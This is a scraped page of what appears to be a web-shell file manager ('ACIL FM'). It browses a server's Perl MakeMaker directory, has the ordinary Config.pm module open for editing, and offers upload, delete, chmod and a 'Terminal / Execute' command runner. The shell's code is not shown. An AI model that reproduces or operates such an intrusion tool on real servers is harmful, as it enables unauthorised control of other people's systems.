ACIL FM
Dark
Refresh
Current DIR:
/usr/share/perl5/vendor_perl/ExtUtils/MakeMaker
/
usr
share
perl5
vendor_perl
ExtUtils
MakeMaker
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Config.pm
602 B
chmod
View
DL
Edit
Rename
Delete
FAQ.pod
19.82 MB
chmod
View
DL
Edit
Rename
Delete
Tutorial.pod
5.36 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /usr/share/perl5/vendor_perl/ExtUtils/MakeMaker/Config.pm
package ExtUtils::MakeMaker::Config; use strict; use warnings; our $VERSION = '7.60'; $VERSION =~ tr/_//d; use Config (); # Give us an overridable config. our %Config = %Config::Config; sub import { my $caller = caller; no strict 'refs'; ## no critic *{$caller.'::Config'} = \%Config; } 1; =head1 NAME ExtUtils::MakeMaker::Config - Wrapper around Config.pm =head1 SYNOPSIS use ExtUtils::MakeMaker::Config; print $Config{installbin}; # or whatever =head1 DESCRIPTION B<FOR INTERNAL USE ONLY> A very thin wrapper around Config.pm so MakeMaker is easier to test. =cut
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply